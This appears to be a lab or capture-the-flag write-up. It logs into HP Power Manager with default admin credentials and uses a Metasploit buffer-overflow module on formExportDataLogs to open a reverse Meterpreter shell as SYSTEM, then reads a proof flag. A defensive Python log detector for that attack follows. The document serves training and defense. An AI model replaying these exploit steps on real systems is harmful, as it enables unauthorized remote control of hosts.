Foothold

admin:admin
msf6 > search HP Power Manager 

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank       Check  Description
   -  ----                                                 ---------------  ----       -----  -----------
   0  exploit/windows/http/hp_power_manager_filename       2011-10-19       normal     No     HP Power Manager 'formExportDataLogs' Buffer Overflow
   1  exploit/windows/http/hpe_sim_76_amf_deserialization  2020-12-15       excellent  Yes    HPE Systems Insight Manager AMF Deserialization RCE
   2    \_ target: Windows Command                         .                .          .      .
   3    \_ target: Windows Powershell                      .                .          .      .
   4  exploit/windows/http/hp_power_manager_login          2009-11-04       average    No     Hewlett-Packard Power Manager Administration Buffer Overflow


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/http/hp_power_manager_login

msf6 > use 0
msf6 exploit(windows/http/hp_power_manager_filename) > exploit 

[*] Started reverse TCP handler on 192.168.45.204:4444 
[*] Generating payload...
[*] Trying target Windows XP SP3 / Win Server 2003 SP0...
[*] Sending stage (176198 bytes) to 192.168.166.45
[*] Meterpreter session 1 opened (192.168.45.204:4444 -> 192.168.166.45:49212) at 2024-08-15 21:34:40 -0500
[*] Payload sent! Go grab a coffee, the CPU is gonna work hard for you! :)

meterpreter > shell
Process 3604 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>type C:\Users\Administrator\Desktop\proof.txt
type C:\Users\Administrator\Desktop\proof.txt
1bde53060c24f53720c1de24105f9db4

C:\Windows\system32>ipconfig 
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection 2:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::5558:ac39:bda7:b9ab%15
   IPv4 Address. . . . . . . . . . . : 192.168.166.45
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.166.254

Tunnel adapter Reusable ISATAP Interface {AD5249E3-105D-452D-AF94-6E3E29548657}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 

Tunnel adapter Teredo Tunneling Pseudo-Interface:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
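The module used above abuses the formExportDataLogs handler of HP Power Manager with an oversized file-name argument. The following detector, added here as an example and not part of the original writeup or of any HP or Metasploit code, scans constructed web-server access-log lines for requests to that handler carrying an abnormally long or non-printable file name. It assumes Common Log Format lines, a handler path of /goform/formExportDataLogs and a query parameter named fileName; only the handler name comes from the module description on the page.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumptions (not from the page): CLF access-log lines, the handler at
# /goform/formExportDataLogs, and the export file name in the "fileName"
# query parameter. Only "formExportDataLogs" comes from the module text.
TARGET_HANDLER = "formExportDataLogs"
MAX_FILENAME_LEN = 128  # a legitimate log export never needs more than this

CLF_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Constructed sample lines: a login, a benign export, and an oversized request.
SAMPLE_LOG = [
    '192.168.166.10 - - [15/Aug/2024:21:30:01 -0500] "POST /goform/formLogin HTTP/1.1" 200 512',
    '192.168.166.10 - - [15/Aug/2024:21:31:12 -0500] "GET /goform/formExportDataLogs?fileName=daily.csv HTTP/1.1" 200 2048',
    '10.0.0.7 - - [15/Aug/2024:21:34:39 -0500] "GET /goform/formExportDataLogs?fileName=' + "A" * 600 + ' HTTP/1.1" 500 0',
]

def parse_line(line):
    """Return the fields of one CLF line as a dict, or None if it does not match."""
    m = CLF_RE.match(line)
    return m.groupdict() if m else None

def filename_values(fields):
    """All fileName values in the request's query string (empty if none)."""
    url = urlsplit(fields["target"])
    if not url.path.endswith(TARGET_HANDLER):
        return []
    return parse_qs(url.query, keep_blank_values=True).get("fileName", [])

def suspicious_export(fields):
    """True when the export handler receives an oversized or non-printable
    file name: what a memory-corruption attempt looks like in the log, and
    something a normal export never sends."""
    return any(len(n) > MAX_FILENAME_LEN or not n.isprintable()
               for n in filename_values(fields))

def scan(lines):
    """Return (source_ip, timestamp, longest fileName length) per suspicious hit."""
    hits = []
    for line in lines:
        f = parse_line(line)
        if f and suspicious_export(f):
            hits.append((f["src"], f["ts"], max(len(n) for n in filename_values(f))))
    return hits

if __name__ == "__main__":
    for src, ts, n in scan(SAMPLE_LOG):
        print(f"{ts} {src} sent a {n}-byte fileName to {TARGET_HANDLER}")
```

A hit is a strong signal to check the host for an unexpected outbound connection from the HP Power Manager service process, which is how the reverse shell above would appear from the server side.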
